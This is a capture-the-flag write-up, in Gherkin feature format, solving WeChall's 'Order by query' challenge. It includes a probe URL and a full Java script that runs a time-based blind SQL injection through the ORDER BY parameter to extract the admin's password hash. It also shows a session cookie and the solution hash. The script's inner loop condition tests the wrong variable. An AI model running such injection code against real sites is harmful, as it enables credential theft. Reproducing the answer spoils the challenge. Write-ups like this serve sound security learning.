# Version 2.0
## language: en

Feature: Order by query
  Site:
    www.wechall.net
  Category:
    Exploit
    Mysql
    Php
  User:
    karlhanso82
  Goal:
    Get user password in MD5
    Using Timing blind Sql Injection

 Background:
   Hacker's software:
     | <Software name> | <Version>    |
     | Windows OS      | 10           |
     | Chromium        | 74.0.3729.131|

 Machine information:
   Given the challenge URL
   """
   https://www.wechall.net/challenge/order_by_query/index.php
   """
   Then I open the url with Chromium
   And I see the challenge description
   """
   Your mission is to find out the Admins password.
   Please submit the uppercase md5 hash as solution.
   You are given the source of the view scripts,
   also as highlighted version
   Click here to see the script in action.
   """
   Then I clicked the source script
   And I saw the code
   Then I came the conclusion that the code is exploitable

 Scenario: Failed Attempt
   When I rewrite at the address bar
   """
   https://www.wechall.net/challenge/order_by_query/index.php?by=3%20ASC--
   """
   Then it show me that I can inject code
   And it don't solve the challenge
   But I decide to search for more information

 Scenario: Success:timing-blind-sql-injection
   And I wrote a java program
   Then I run it
   """
   import java.net.*;
   import java.io.InputStreamReader;
   import java.io.BufferedReader;
   import java.io.DataOutputStream;

   public class Conec {

    public static void main(String[] args) throws Exception {

     String resp = "";
      for (int i = 1; i < 50; i++) {
       for (int k = 32; i < 128; k++) {
        long start = System.currentTimeMillis();
        URL url = new URL("http://www.wechall.net/challenge/order_by_query/" +
        "index.php?by=3,if((select%20ascii(substr(password," +
        i + ",1))%3D" + k +
        "%20from%20users%20where%20username=0x41646d696e),sleep(1),2)");
        HttpURLConnection con = (HttpURLConnection) url.openConnection();
        con.setRequestProperty("Cookie","WC=11486925-47436-ikeLcmTHStimHmnN");
        con.connect();
        int status = con.getResponseCode();
        BufferedReader in = new BufferedReader(
        new InputStreamReader(con.getInputStream()));
        String inputLine;
        StringBuffer response = new StringBuffer();

        while ((inputLine = in .readLine()) != null) {
        }
        in.close();
        float elapsed = (System.currentTimeMillis() - start) / 1000F;
        System.out.println("i:" + i + " k:" + k +
        " elapsed:" + (elapsed) + " resp:" + resp);
        if (elapsed > 8) {
         resp += String.valueOf(Character.toChars((int) k));
         break;
        }
       }
     }
   }
  }
  """
  Then the code makes a series of request according the loop
  And if i value in our query is equal to k value
  Then if it true the server is going to take a time to reply that query
  Then with that gap time we fill our resp message
  And that gap time is more than the normal
  Then we fill the resp var if the gap time is more than eight seconds
  Then After long time of process
  Then we saw the password in MD5 3C3CBEB0C8ADC66F2922C65E7784BE14
  And it solves the challenge
